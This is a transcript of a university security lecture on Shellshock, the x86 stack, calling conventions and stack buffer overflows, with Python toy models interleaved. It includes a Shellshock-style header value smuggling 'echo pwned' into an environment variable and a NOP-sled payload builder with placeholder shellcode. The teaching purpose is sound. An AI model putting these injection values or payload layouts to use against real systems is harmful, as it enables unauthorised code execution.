Folks, thanks for coming. I was just mentioning that I appreciate you showing up on a short week. So I'd like to start us off by talking about free money. Everybody loves free money. Well, this money is definitely not free, but who here is an American citizen? I want to let you know, because I realized I don't think I've done this yet, that we have a Scholarship for Service program here at ASU, funded through the National Science Foundation. The National Science Foundation just gave us a $4 million grant to give out scholarships to students.

It's actually a super cool program. To be eligible you have to be a U.S. citizen. They'll completely pay for your tuition, so, let's see: full-time tuition and education reimbursements, a book allowance, plus a stipend, so you actually get paid to go to school on top of tuition and everything. In exchange, you agree to go work for the government: roughly, for every year they pay for your schooling, you go work in the federal government for a year, specifically around security. So the idea is that they pay for your education and you pay them back by working for them.

Is it retroactive? No. No, but it is very soon to be active. If you get your application in within the next week or two, they can start funding you starting spring 2018. So if you have one more semester left, then yes, you could even do that. Two weeks is probably not enough.

So: U.S. citizen, and this is bachelor's and master's, so even if you're doing your master's you can do this. You do an internship during the summer, and we fly you out to DC so you can go to job fairs and talk to interesting people there. Some of the people I know who've gone through it have gotten jobs
at places like the NSA and various other organizations, so this is a super cool program, and I think it's a nice way to go to school. Plus, you'll usually get a security clearance as part of this, since most of the jobs require one. So you go do your time working in the federal government, and then you're completely set, whether you want to continue on the public service path or go into industry and make a ton of money, because you have a clearance and you have the experience of actually working in a real organization doing security stuff. And it's super easy to apply, that's the other thing. It's just an application form with your resume and official transcripts. It's really easy. This slide is old and out of date, but if you'd like to talk to someone, let me know and I'll send you to Dr. Yao. Dr. Yao is in charge of organizing and managing the program. Any questions? It's super cool. Cool.

Okay, so, oh, before we get started on this: assignment four is going to be up today. It's going to be super fun. It's going to be a binary server with a number of different challenge services, and you have to break those services to get points, depending on how many you break. I don't know the exact breakdown yet, but it will be super fun. You highly doubt that? Fun for me.

Before I send out an email: because this will be a shared server, I've tried to put protections in place, but don't be overtly malicious, in the sense of trying to DoS the server. That's super lame. What else could you do? Don't write a thing that uses up all of the free space on the server, because then I just have to go in and implement things to stop that in the future, and that's really annoying for me, so don't do that. Yeah, it'll be cool. So, instructions later. Cool.

All right, so we were talking about command injection. The example I want to bring up is a bug called Shellshock. Does anybody remember this?
Hearing about this? A few people. So this was a bug disclosed in September 2014 that had existed for about 20 years in bash. We've seen that environment variables are basically inherited from one program to another, and bash passes its environment variables to other instances of bash. In addition to passing variables, which, yes, of course, makes sense, you can actually pass functions to other instances of bash by setting an environment variable whose value starts with parentheses, open and close, followed by the function body that you want. So the first thing bash does when it starts up is look at the environment variables and see whether there are any whose values start with these parentheses, and if so it basically evals that code. So by appending commands there, you can basically execute arbitrary commands.

So this was a huge problem. We talked about how GitHub actually allows you SSH access to their servers in a very limited way. Well, they're actually running bash, so you can pass this in through the SSH_ORIGINAL_COMMAND environment variable. Or take CGI web applications. CGI web applications are web applications that are executed as if they were binaries, and they get their inputs from environment variables. And the environment variables are controlled by the user, so the user can make a request to a web application and get arbitrary code execution without any authorization. All you need to do is make a web request.
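To make the flaw just described concrete, here is a toy model in Python. It is a sketch under loud assumptions: it is not bash's real parser, and the names `import_environment`, `split_function_value`, and the sample environment are all made up for illustration. It only mimics the behavior described above, where a value that starts with `() {` is treated as a function definition and whatever trails the function body gets evaluated too.

```python
# Toy model only: this is NOT how bash is implemented. It imitates the
# behaviour described in the lecture for illustration.

FUNC_PREFIX = "() {"


def split_function_value(value):
    """Split a value into (function_definition, trailing_text) at the closing brace."""
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return value[: i + 1], value[i + 1:].lstrip("; ").strip()
    return value, ""


def import_environment(env, patched):
    """Return (functions, commands_run) for a hypothetical shell start-up."""
    functions, commands_run = {}, []
    for name, value in env.items():
        if not value.startswith(FUNC_PREFIX):
            continue  # ordinary variable: nothing is evaluated
        definition, trailing = split_function_value(value)
        functions[name] = definition
        if trailing and not patched:
            # The vulnerable behaviour: text after the function body runs too.
            commands_run.append(trailing)
    return functions, commands_run


# A CGI server copies request headers into environment variables, so the
# attacker controls this value just by making a web request.
env = {
    "HOME": "/home/student",
    "HTTP_USER_AGENT": "() { :; }; echo pwned",
}

print(import_environment(env, patched=False)[1])
print(import_environment(env, patched=True)[1])
```

In this model the unpatched start-up reports `echo pwned` as a command that would run, while the patched one imports the function definition and runs nothing.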
That's why this is actually a really big deal. I think this may have started the trend of cool vulnerabilities with cool names and logos. All right, so I think it's one of these cases where, as it was originally written, this was probably a feature, and then when bash started to be used in all these different settings it came to be a huge security bug. And I think the documentation around this functionality was incredibly poor as well, in the sense that almost nobody knew about it. So it's basically code that nobody ever used, but bash included it. So, yes, it's the kind of thing where if you change the environment, or take an application and put it in a different environment, a feature can now be a security bug.

So now we're going to talk about buffer overflows. This is going to be our introduction to one of the core security vulnerabilities in applications, and it's something so silly that you wonder why it should ever even be a problem: the lack of boundary checking when you're writing C or C++ applications. So what do I mean by boundary checking here? What boundaries do I care about checking? What is a buffer? Say, someone's first name. Exactly. I think I explicitly had a test case for this on assignment one, the secure house, where I made absolutely huge names, because people make assumptions about what size names will be. If you're writing a C program and you've only allocated, let's say, a space of size 100 to read people's names, that should crash the program.

These are still one of the most popular types of attacks, and they show up in all kinds of different applications. The actual exploit is going to be architecture and operating system dependent. You can run these both locally and remotely, and the key capability a buffer overflow gives you is that it can allow you to alter the code or the data of the application.
Well, sorry, I misread that: you can alter the data of the application, and you can alter the control flow of the application. So what's the control flow? Yeah, it's what the program is going to execute next. And it's a way we're not used to thinking about programs, right? We look at the code and we can see, okay, the main function starts to execute, so line one executes, and then two, and then three, and then depending on this branch condition line four will execute or line five will execute, and after that this function will be called. It's very easy and clear to see the control flow.

There's actually a lot of research into how to automatically exploit these vulnerabilities, so there are tools out there that can find buffer overflows and automatically generate an exploit for them, which is very cool. And there's also a lot on the flip side, asking how we can actually prevent successful exploitation of these attacks. So there are mitigation techniques. One of the reasons I love security is that you have this awesome arms race, where the attackers say, okay, we're going to exploit buffer overflows to hijack control flow, and the defenders go, great, we're going to completely randomize the memory layout so you never know where the stack is. And so the attackers say, okay, then we'll up our game, and, as we'll see, we'll do return-oriented programming or return-to-libc techniques, so I don't even care where the stack is. And so the defenders say, okay, well, let's change the location of libc, and then it's this escalating game. But attacks always get better, so without fundamentally solving this issue you're still going to have these types of attacks.

So in order to understand that, we need to understand the stack. This should be familiar to you if you took 340 with me. So what is the stack, in terms of the
computer architecture, so not the abstract data structure of a stack? What is the stack? What does that mean? So anything that your program needs memory for, such as local variables, it'll put on the stack to use in that scope. And the second thing? Something with stack pointers. Right, so similarly to that abstract stack data structure, we push things onto the stack and then we pop things off the stack. But it's not just a huge array that we can write whatever we want to. But yes, great.

And as we talked about, it starts at high memory addresses and grows down, so the stack is growing when the stack pointer is decreasing in value. That's actually a tricky thing to conceptualize, but it's fine. And a function can do whatever it wants with the stack, so it can use it essentially as scratch memory, as we said. The assembly language really does support this mechanism on x86. The register ESP holds the memory address of the current top of the stack. When you think about stacks, you put things on them at the top. You could also say it's the bottom, depending on whether you draw memory with high addresses above or below.

And so we have instructions like push EAX, which says: store whatever is in the register EAX on the stack, and move the stack pointer down enough to make room. We have pop EAX, which does the reverse and moves things off the stack.

So here's a brief example. We have memory from all Fs down to all zeros, and we're at memory location hex 10000 here. So if I tell you that the top of the stack is hex 10000, what's the value that's going to be in ESP? Hex 10000, exactly. These two are tied together: you don't know where the top of the stack is if it's not in ESP, right? Whatever's in ESP is the top. So what do we know about everything
in our diagram above address 0x10000? It's got important stuff in it, right? That is all in the stack. And by that same logic, everything below that should be not-important stuff, or garbage, stuff that we don't care about.

So we have some super simple instructions, push EAX and pop EBX. Say our registers look like this: we have 10 in EAX and 0 in EBX, and ESP, as we said, has the hex value 0x10000. We'll start here. We'll push EAX, which means the stack pointer will be decremented, so the stack pointer moves down four bytes, and the value that's inside the EAX register will be put into memory where the stack pointer is now pointing. And no, we're not drawing this a hundred percent precisely, because this would be four bytes, so it'd be 0000000a. I don't remember which order the bytes would be in, that's the endianness, but we'll ignore that for now. And finally, when we pop EBX, we first take the value that's currently where the stack pointer is, that hex a, copy it into EBX, and then increment the stack pointer by four, essentially freeing that memory and saying, okay, now we can reuse that memory. Great. So we just did two instructions that essentially copied EAX into EBX, but using the stack. Questions on the stack?

Now, to really understand the problems of a buffer overflow, we need to understand what is actually stored on the stack. As already mentioned, the stack is used for scratch storage. One of the main uses is local variables: this is where local variables are stored for each instance of an executing function in the current call graph. So the idea is that the currently executing function will have its frame pointer in EBP. For ease-of-use reasons, we don't want to use the stack pointer to reference into our function frame. So it's something like this. So we have our main function.
We have local variables a, b, and c, which are 10, 100, and 10.45, then a is equal to a plus b, then return zero. So what the compiler does when it sees local variables is basically generate an offset from EBP. It says, okay, a will be at EBP plus some value, and everywhere in this function, for every reference to a, I will use, say, EBP plus 4. Same thing with b and c. And then compiling the code actually becomes really easy, because you say, okay, at the memory of EBP plus a, set that equal to 10; at the memory of EBP plus b, set that equal to 100; and so forth for 10.45; and then finally a is equal to a plus b. So it's kind of a pseudocode translation of what's going on there, and then it compiles that out to actual x86 code.

So, for instance, the compiler can choose whatever order it wants for a, b, and c. It does not matter. There's no specification that says it has to do it one way or the other. Historically, I think it's usually in this order, where a will be the bottom-most. Actually, I take that back. I have no idea what order it's going to be. The truth is, to figure out the order you have to look at the assembly code. If you're ignoring the assembly code and just looking at the C code, there's no guarantee that they're even related at all. So here we have a at EBP minus 0xc, b at EBP minus 8, and c at EBP minus 4.

So the first thing that needs to happen when a function first executes is that it needs to create space for its local function frame, and it needs to store the previous base pointer, because the current, sorry, the current base pointer belongs to the function of whoever called it. So the very first thing it does is... well, let's go through this. Sorry.
Let's ignore that for now. It needs to create space on the stack, so it creates 16 bytes on the stack by decrementing the stack pointer by 16. This is another one of these things where subtraction is actually getting you more space on the stack. We then move 0xa into EBP minus 0xc. We move 0x64, and hex 64 is 100, into EBP minus 8. We move this crazy value into EAX and then move EAX into EBP minus 4. What's this crazy value? 10.45 in floating point. And then we move, let's see, EBP minus 8. What's at EBP minus 8 here? b. And what's in b right now? 100. So it's going to move 100 into EAX. Then it's going to add EAX to, sorry, to EBP minus 0xc, and EBP minus 0xc is a. Wait, is that right? Move b into EAX, then add, so a is equal to a plus b. Yeah, okay.

Okay, so with add you usually think of it in this way, a is equal to a plus b. Here you have add EAX to EBP minus 0xc, which is a, so it wasn't b you're adding to, it's a, and the destination is the second argument here, so it's saving that value back into EBP minus 0xc. Okay, cool.

So, looking at how this all actually works: we have our stack pointer here. We first have to subtract 0x10 from ESP, which is decimal 16. So now this is our function frame, and now we have two pointers. There are two arrows here, right?
The arrow at 0x10000 is our base pointer, so all of our local references will be relative to that base pointer, which is fixed for this execution of this function, while our stack pointer could change depending on what happens. But this proceeds as you would expect: we put 10 into a, we put 0x64 into b, and we put the crazy value that was 10.45 into EBP minus 4. Then we move what's at EBP, which here is 0x10000, minus 8, which is 0x64, into EAX, and we add that to the 10. Questions here? Okay.

So we saw in this example that we're clearly reserving space in each function frame for the local variables. But the question is: if you're a function that gets called, how do you know where to go back to, and why do you need to know that? What happens when a function is done executing? Does the program terminate? It returns to where it was called from. But as we've seen and talked about, CPUs are incredibly dumb, right? They just execute instruction, instruction, instruction, instruction. They don't have any concept of function calls or anything like this. This is something that we essentially add on top, in memory. So we need some way to go back to the function that called us.

And we need other things too. When you call a function, do you want it to just do something and then return? What do you want back from that function when you call it? A return value. Yeah, there may be a return value that you want, right? And you have to actually pass parameters into a function. So I'm a function: how do I know how to grab parameter one, or a, or b, or whatever the value is? We need our frame pointer.
We also need the return address, so we know where to go back to. And we have local variables and temporary variables. So the idea is that the calling convention defines how one function calls another, and specifically who does what in relation to all of these things. All of these things must be stored on the stack. They need to be stored in memory because the CPU has no idea about any of this stuff.

So we need some kind of calling convention. It's super annoying, because this varies based on processor, operating system, compiler, or even type of call. For instance, as we saw with syscalls, when you're making a syscall into the kernel, you call int 0x80, you put the syscall number you want in EAX and the other values in EBX, ECX, and so on. So you put the parameters you want to pass into registers. However, the normal calling convention for calling functions on 32-bit Linux does not use registers, it uses the stack. But this changes on a 64-bit operating system, which has a different calling convention entirely. So you just have to look this stuff up. This isn't something you're just magically born knowing. You have to study these things, think about them, and look at code.

So the idea is that the caller first pushes the arguments onto the stack in order from right to left. If you think about it, the rightmost argument will be here, and then the second will be underneath that, and then underneath that the third, fourth, fifth, however many arguments there are, right? So the stack is growing down. Then the caller, as a byproduct of the call instruction, pushes the address of the instruction after the call. This is super important, because it answers the question: where do we start executing after this function call?
The callee, the function that gets called, has its own responsibilities: to save the previous frame pointer if it's going to use one, to create space on the stack, and to ensure that the stack is consistent. And finally, which is actually surprising, you pass arguments to a function by putting them on the stack, but the return value goes in the EAX register. There are all kinds of architecture decisions about who should do what and all this type of stuff, but we won't go into that.

Let's look at an example. So look at our main again. We'll have a local variable a, we'll set a equal to calling callee(10, 40), and return a. And we'll have the callee function, which takes in a and b and returns a plus b plus one. So when we compile this and run objdump on it to look at the assembly, we'll see push EBP, move the base pointer to the stack pointer, no, stack pointer to the base pointer, sorry. Move the stack pointer into the base pointer, subtract 0x18 from the stack pointer, move 0x28 into ESP plus four.

Right. So, the important parts when you're looking at assembly code: almost every function will have an incredibly similar prologue here. Remember, main is a function like any other, right?
It has to return. Somebody actually calls main and sets the exit status of your process to whatever you return from main, and that's how your process's exit status gets set. So main itself has to follow the calling convention. Main has to first store the previous caller's base pointer. That's the push EBP, which moves the stack pointer down and stores the base pointer there. Then it moves the current stack pointer into the base pointer, basically saying: wherever I am on the stack right now, this is now the base pointer for me. And then you create space on the stack for yourself, so you move the stack pointer down by 0x18. And then we have a part at the end of the function called the epilogue, which essentially undoes everything the prologue did and gets us back, but we'll go through that in a second.

The other function pushes EBP. So again, this is what you have to do every single time: push EBP, move the stack pointer to the base pointer. Then it moves EBP plus 0xc into EAX, moves EBP plus 8 into EDX, adds EDX and EAX and puts the result in EAX, adds one, pops EBP, and returns. So again, a prologue and an epilogue.

So why is this one using EBP plus 8 and this one using EBP minus 4? Yeah, right, so what would you say EBP plus 8 is? The arguments to the function, right. Exactly. The base pointer will point into the function frame, and above that base pointer, at positive offsets, are the arguments that the caller passed in, whereas negative offsets from there are local variables, local to that function. So this EBP minus 4 is the local a, and here, the order doesn't actually matter, but 8 and 0xc are a and b. Cool.

So we can look through this to see what happens. We can also see this if we run objdump.
We'll see the bytes that these instructions get compiled to, and we saw that the ELF header specifies that these instructions must be in the program at these fixed locations. You can check this out. I don't remember what version I did this in, so if you do this on your own you will get completely different numbers, just FYI, and depending on your GCC version you'll get different output as well.

Okay, so we have our stack, we have our registers, and we are ready to virtually go. Let's say our stack first starts at fd2d4, so that will be the current stack pointer. Main is called, and we know we're at this instruction because the instruction pointer has the address of that instruction. Then that instruction executes. Let's say the base pointer is something, whatever. We push EBP on the stack. We move the current stack pointer to the base pointer, thus setting up our local base pointer for main. We subtract 0x18 from the stack pointer, so now all of this is main's function frame. We then move 0x28 into ESP plus 4, so that's the stack pointer plus 4, which is up here. We move 10 into where the current stack pointer is, and now we're going to call the function.

So what have we done to the stack right before this call? We've put on the values that we're passing into the function. Right, exactly. So which one's which? The convention goes right to left, so the rightmost argument, which is b, goes on first, which means it will be the topmost of these arguments. And then the argument after that, the leftmost argument, which is a, goes on the stack below it. I should have drawn this. So we have 0xa here. So now when the callee function executes, it knows how to fetch both of these values, and it knows that the first argument will be this one and the second argument will be four above that.
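The stack operations used so far, push, pop, and setting up arguments before a call, can be sketched with a tiny Python model. This is an illustration under stated assumptions, not real machine behavior: the class name `Stack32` is made up, memory is modeled as a dictionary of 4-byte words, and the starting address 0x10000 is the one from the earlier diagram. Note that the compiled main in the lecture writes its arguments with mov into ESP and ESP plus 4 rather than with push; the resulting layout is the same.

```python
class Stack32:
    """Toy model of a downward-growing 32-bit stack (hypothetical helper)."""

    def __init__(self, esp):
        self.esp = esp   # address of the current top of the stack
        self.mem = {}    # address -> 4-byte word

    def push(self, value):
        self.esp -= 4                       # growing the stack lowers ESP
        self.mem[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4                       # the old slot is now garbage
        return value


# push eax / pop ebx: copies EAX into EBX by way of the stack.
s = Stack32(esp=0x10000)
eax, ebx = 0xA, 0x0
s.push(eax)
esp_after_push = s.esp          # 4 bytes below where we started
ebx = s.pop()
print(hex(esp_after_push), hex(ebx), hex(s.esp))

# Arguments for callee(10, 40), placed right to left.
s.push(40)   # b, the rightmost argument, goes on first
s.push(10)   # a ends up at the top of the stack
print(s.mem[s.esp], s.mem[s.esp + 4])
```

After the two argument pushes, a sits where ESP points and b sits four bytes above it, which is the layout the callee relies on.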
But we need to leave a breadcrumb. We can't just start executing from 0x8048394, because where do we want to go back to after callee executes? Yes, 0x80483bf. That's the instruction we want to execute after callee is done. But how does callee know to go back there? There's no magic here, right? We can't just magically signal where we want to go. And this is why the call instruction here is different from, let's say, a jump instruction. With a jump you just jump to a location. But here we want to call this function, so it does two things: it sets the instruction pointer to whatever this value is, and it pushes onto the stack what we call the saved instruction pointer, the next instruction that we want to execute after callee is done executing. So that's where this 0x80483bf came from, because this is where we want to go. This is our way to tell the function that we're calling: hey, this is where we want you to go back to. You can think of this like a breadcrumb, right? Main is leaving a little breadcrumb so that the program knows how to go backwards.

And so callee is going to do its thing. It's going to push EBP. It's going to move the stack pointer to the base pointer and set up its own base pointer. So from its current base pointer here, at fd2d0, we can see that what's stored there is the saved base pointer of the previous function frame, and above that is the saved instruction pointer of whoever called it, and then finally the arguments from left to right, because now we're going up the stack. So this is a and then this is b, and this is how it knows: okay, here's main, here's callee. And so it goes, great, move what's at EBP plus 0xc, which should be 0x28 here, into EAX, move what's at EBP plus 8, which is a, into EDX, add them together, add one, pop EBP.
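The breadcrumb mechanism can be written out as a small Python simulation. This is a sketch, not a real emulator: `simulate_call` is a hypothetical helper, memory is a dictionary of 4-byte words, and the starting ESP and EBP values in the usage lines are placeholders. It models the caller placing arguments, call pushing the saved instruction pointer, the callee's prologue and epilogue, and a ret that behaves like "pop EIP".

```python
def simulate_call(esp, ebp, return_address, args):
    """Model `call callee`, callee's prologue/body/epilogue, and `ret`.

    Returns (eax, eip_after_ret, esp_after_ret, ebp_after_ret).
    """
    mem = {}

    def push(value):
        nonlocal esp
        esp -= 4
        mem[esp] = value

    def pop():
        nonlocal esp
        value = mem[esp]
        esp += 4
        return value

    # Caller: arguments go on right to left, then `call` leaves the breadcrumb.
    for arg in reversed(args):
        push(arg)
    push(return_address)          # saved EIP

    # Callee prologue: push ebp; mov ebp, esp
    push(ebp)                     # saved EBP of the caller
    ebp = esp

    # Callee body: arguments live above the saved EBP and the saved EIP.
    a = mem[ebp + 8]
    b = mem[ebp + 0xC]
    eax = a + b + 1               # return value travels back in EAX

    # Callee epilogue: pop ebp; ret
    ebp = pop()                   # restore the caller's base pointer
    eip = pop()                   # ret: whatever is on top becomes EIP
    return eax, eip, esp, ebp


eax, eip, esp, ebp = simulate_call(
    esp=0x1000, ebp=0x1020, return_address=0x80483BF, args=[10, 40]
)
print(eax, hex(eip), hex(esp), hex(ebp))
```

The callee never learns who called it. It only trusts the word sitting at the top of the stack when ret executes, which is why that word matters so much for security.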
So now we're actually returning from this function. We've set the base pointer back to that of whoever called us, and now comes the most critical part when it comes to security. Remember again: does callee know that it has to go back and start executing at 0x80483bf? No. What does it know that it has to do next? Whatever value is currently at the stack pointer, that's what we want to go execute next. Right, because callee doesn't know, and this is the whole point: your functions aren't designed to be called from only one location, so they can't just be hard-coded to go back to one place. Functions are designed so they can be called from anywhere in your program. So the idea is that the return instruction, you can literally think of it as a pop EIP: take whatever value is currently on top of the stack, put it in the instruction pointer, and just start executing from there.

So that will then move the instruction pointer here, and main does the same kind of thing. We move the result from EAX into a, then we do a leave, which is the opposite of these two prologue steps, and then main returns, because somebody called main. So what's the value that's right at fd2d4? Do we know the hex value that's there? No. Do we know roughly what kind of value it should be? An address. And that's what we'll go execute, right? Main's job is done. It doesn't care who called it. It just knows: okay, when I return, I'll just go execute from whoever called me.

So now, what happens when we overflow a pre-allocated buffer? We've given ourselves a character buffer of a hundred characters or something on the stack, and we overwrite it with 200 characters or something. Normally that's going to cause a segmentation fault.
That was maybe the bane of your existence the first couple of times you wrote C and C++, and maybe it still is. Hopefully not, but it definitely still happens. So we already know, okay, if we can give input to a program that causes it to just crash, that's an availability attack, right? Which is good, you know, that's something we want to find and prevent. But we can actually specially craft the input in order to jump wherever we want in the program. And the idea is that whatever we execute is executing with the privileges of that program. So if it's a setuid root program, then if we can somehow trick it into executing code of our choosing, that code will run with root's permissions, not ours.

All right, cool. So now we need to look at this. Basically, the saved base pointer, so the previous function's frame pointer, and the saved instruction pointer are stored on the stack, and we can control them. So think about it like this. Who knows the story of Hansel and Gretel? How do more of you not know it? The idea is you have this brother and sister, doesn't matter, these kids who go into the forest, the dark forest, and they're scared. So they want to be able to find their way home. So they smartly take a loaf of bread, and as they're walking, every few feet or so they leave a piece of bread on the ground. Which is great, because they can go out, do whatever they want, and then to get home they just follow the bread trail. Right, so what's the problem with that plan? There's no problem? It works out fine for them in the end? Something gets the breadcrumbs. What was that?
Yeah, well, what happens if either a person or even just birds come and eat that bread? Now you're trying to follow the trail in reverse to get home, and you get to a point where you're stuck and you don't know where to go. Now you're lost in the woods. Or what if either a malicious person or a very smart bird is able to rearrange those breadcrumbs, maybe take their own loaf of bread and lay a false trail that leads right into their oven or something, so they can cook and eat these children, which is essentially what the story is about. And that's exactly what we're going to do here.

Cool, okay, so we're going to have a function, mycpy, that copies its argument into a four-byte character buffer, and we're passing this string into mycpy. So, looking at the assembly, we can see here that we have our prologue, then we're moving this value, which is presumably the location in memory of this character pointer. The bytes at this memory location will be the bytes "ASU", space, "CSE", and so on. We'll call that function. We will then call printf, and then we put zero in EAX, because we're just going to return zero. Whereas mycpy will do its thing.

And the important thing to do is look at how this actually works. So we have a similar situation. We have our instruction pointer here. We're going to do the prologue: we save the base pointer, we set up our base pointer for our current function frame, and we create space on the stack for our local variables. We move 0x8048504 onto the stack where ESP points. Then we call mycpy. So why did this value end up here on the stack? It's the return instruction pointer. Yes, it's the saved instruction pointer, which, if we look, should be the address of this instruction, because main wants this instruction to execute next, right?
So mycpy starts executing. It goes, great, I'm mycpy, doing my thing, I need more room on the stack, and then I get here, where I finally call strcpy. And so we can see here that I put 0x8048504 on the stack. That's the pointer, the memory address of that long string we passed in. What's this fd2ac value? We haven't actually called strcpy yet. We're right about to call strcpy, but we haven't called it yet. So before we call the function, what do we need to do? Yeah, we need the source and the destination buffer. If we look at strcpy, we see that the rightmost argument is the source and the other one is the destination. So fd2ac is here: this is our character buffer that we allocated on the stack, way back.

All right. So now we're going to call strcpy. Does strcpy know that our buffer is only size 4? What does strcpy do? It copies bytes into the buffer until when? How many bytes? Not quite, but close. How does it know that there aren't any more bytes to copy? The null byte, yes. So basically, you could write strcpy yourself, it's very simple. You literally dereference the source and check whether it's null. If it is, you return. Otherwise you copy it into the destination, increment both pointers so you're pointing to the next byte, and you just keep doing that over and over and over again, right? So it's not bounded by the size of the destination buffer. It's bounded by the size of the input.

So when strcpy runs, what happens? We know that at 0x08048504 are these bytes followed by a null byte. And so what's going to happen? Well, just like we said, strcpy is incredibly dumb. It's going to copy "ASU" and a space here, and then "CSE", and you can actually see that these are the hex representations of those characters. And is it going to stop because it says, oh, this buffer was only four bytes long? No, it doesn't know that. It's just copying memory, right?
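The copy loop just described can be modeled in a few lines of Python to show why nothing stops it at the end of the buffer. Everything specific here is an assumption for illustration: the function name `strcpy_model`, the frame layout (a 4-byte buffer, 8 bytes of padding, then the saved EBP and saved EIP), the placeholder saved values, and the input string, which is a stand-in rather than the exact string from the slides.

```python
def strcpy_model(memory, dest, src_bytes):
    """Copy bytes into memory at dest until a NUL byte has been copied.

    Like C's strcpy, it never asks how large the destination is.
    Returns the number of non-NUL bytes copied.
    """
    i = 0
    while True:
        byte = src_bytes[i]
        memory[dest + i] = byte
        if byte == 0:
            return i
        i += 1


# Hypothetical frame layout, lowest address first (an assumption):
# [0:4] buffer, [4:12] padding, [12:16] saved EBP, [16:20] saved EIP.
BUF, SAVED_EBP, SAVED_EIP = 0, 12, 16
frame = bytearray(24)
frame[SAVED_EBP:SAVED_EBP + 4] = (0x000FD2D8).to_bytes(4, "little")  # placeholder
frame[SAVED_EIP:SAVED_EIP + 4] = (0x08048423).to_bytes(4, "little")  # placeholder

copied = strcpy_model(frame, BUF, b"ASU CSE 340 Fall 2015\x00")

saved_ebp = int.from_bytes(frame[SAVED_EBP:SAVED_EBP + 4], "little")
saved_eip = int.from_bytes(frame[SAVED_EIP:SAVED_EIP + 4], "little")
print(copied, hex(saved_ebp), hex(saved_eip))
```

With this layout, 21 bytes go into a 4-byte buffer, so both saved slots now hold ASCII text from the input instead of the values the caller left there. A function that later returns through this frame would jump to whatever those four bytes spell.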
There's no internal concept in a C string of the length, or, sorry, of the size of the buffer. I guess there is a length, but the length is just however far it is to the null byte. So it's going to keep copying, right? So it clobbered the arguments and, just like in our story, the saved base pointer and the saved instruction pointer. Just like our example of birds coming and eating the breadcrumbs, we've completely overwritten the saved instruction pointer and the saved base pointer, and it actually kept overwriting things past that. And then strcpy returns, because strcpy knows where to return to: we didn't overwrite its saved instruction pointer, which is stored down here. So mycpy's instruction pointer of 0x0804840C was stored here, and that gets returned to correctly. Everything actually goes just fine. We execute these next instructions fine. We do a leave, which takes "Fall" and puts it into EBP, which now makes our base pointer point wherever, and then we get to a ret, where the program will start trying to execute at 0x31303220. So what happens then? A crash, a segmentation fault. It's going to try to access some memory that's not allocated to the program. In our analogy, our program is now lost in the woods. It doesn't know where to go, so it blows up. And you can actually do this: if you run this example, you get a segmentation fault. If you run it in GDB and debug it, you will see that it has a segmentation fault because it's trying to access 0x31303220, which was the last part of our string. And if we look at all the registers, we'll see that, yep.
We changed the base pointer and we changed the instruction pointer. So at this point, we actually control the instruction pointer and can get this program to execute wherever we want. So, functions to keep in mind that are essentially always dangerous: gets, because you're getting data from the user, and you read data from the user until there's a newline or end of file. So fundamentally, when you're calling this function, you have no idea how big the data could be, so there's no way to properly size a buffer in advance. strcpy: if the attacker can control the source buffer, they can supply as many characters as they want in order to overflow the destination buffer. sprintf, vsprintf, the scanf series of functions. Also custom input routines: maybe they're even calling getc, which gets a single character, but they're essentially implementing one of these things and just appending to a buffer. You can get overwrites there too. So it's very clear we can get it to crash, and that's a good first step, but we want to go further. We don't want to just take down the availability of that program. We want to be able to control that program. So how do we do that? The idea is once we control EIP, it's kind of game over at that point. Once we do that, essentially, we can tell the program to go wherever we want. There is an excellent paper, which I think just turned 20, called "Smashing the Stack for Fun and Profit."
This was one of the first, published in a hacker magazine called Phrack, and it's a really good read. I highly recommend looking through it, because you can see that even back then... to think about it, we've had this for like 20-plus years, and this is still an incredibly common vulnerability and attack. Okay, so what I'm going to do here is actually take you up to the modern day. So your first thought is, well, we can control the instruction pointer, we can control where this program goes, so why not just inject code onto the stack? So if we went back here: what if, instead of injecting "ASU CSE 340 Fall" whatever, we injected bytes that actually did what we wanted to do? Let's say it's a program running as root, and we do, I don't know, whatever gives us a bash shell as root. Right, we can inject assembly instructions onto the stack and then just tell the instruction pointer: hey, go to the start of these instructions and start executing them. That's the first round. This is called shellcode. Shellcode is the name for any kind of code that you're executing like this that's location-independent. Just like we talked about, though, it's an arms race. The operating system vendors and the defenders said: well, great, in order to do this, you need to know exactly where to point the instruction pointer. So for instance here, let's say the start of this "ASU" was the start of our shellcode. We would have to make sure we overwrote, I believe it was this one, 0x31303220, with FD2AC, because that's where we want to execute next. So the defenders' idea is: well, what if we completely randomize the location of the stack on every execution?
That way you won't actually be able to guess and know where to go. So the bad guys said: okay, great. What I'll do is add a bunch of NOPs, a no-op, which is hex 90, to the start. Literally, you can do a hundred megs of NOPs, and then all you have to do is guess an address somewhere within those NOPs, and just like a slide or a sled, you start doing nothing, nothing, nothing until you hit your shellcode and actually do what you want. Which, on 32-bit architectures, is actually reasonable. You can even use NOP sleds of like a gigabyte to completely work around ASLR, so it only takes like 10 guesses to be right, because, as we learned, an attacker only needs to be correct once. Right, so then the defenders said: okay, that's a good technique, ASLR doesn't really stop that. So the main problem is: who wants to execute code on the stack? What's the stack for? Is it for executing code? No, it's for reading and writing data. It's scratch memory. Right, so do programs need to execute code on the stack? Well, probably one of the programs you use most often, a browser, does this all the time. Browsers do what they call just-in-time compilation of JavaScript code: they take JavaScript code, compile it to assembly, and execute it, and that code will live either on the stack or in the heap. So some programs actually need executable stacks, because they want to be able to execute code there. But most programs don't need that. So the idea is: hey, we saw that in the ELF file format you can specify the permissions of all of these memory sections, so just make the stack not executable. Solved, right? Because now it doesn't matter even if you know the addresses: you start executing here, and the operating system says: error, you're not allowed to execute code in this memory page. So it'll throw an exception.
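The NOP-sled layout mentioned above can be sketched in Python. This only illustrates how such a payload would be laid out and why a guess anywhere inside the sled is good enough. The offset to the saved return address, the guessed address, the sled's assumed start, and the one-byte placeholder standing in for real shellcode are all hypothetical values.

```python
import struct

NOP = b"\x90"  # the one-byte x86 no-op instruction

def build_payload(offset_to_ret: int, guessed_addr: int, sled_len: int, shellcode: bytes) -> bytes:
    """Filler up to the saved return address, the guessed address, a NOP sled, then the shellcode."""
    filler = b"A" * offset_to_ret
    ret = struct.pack("<I", guessed_addr)  # little-endian 32-bit address
    return filler + ret + NOP * sled_len + shellcode

def guess_hits_sled(guess: int, sled_start: int, sled_len: int) -> bool:
    """A guess works if it lands anywhere inside the sled, not only on the first shellcode byte."""
    return sled_start <= guess < sled_start + sled_len

# Hypothetical numbers: 16 bytes of filler, a 100-byte sled, and 0xCC as a stand-in for shellcode.
payload = build_payload(16, 0xBFFFD310, 100, b"\xcc")
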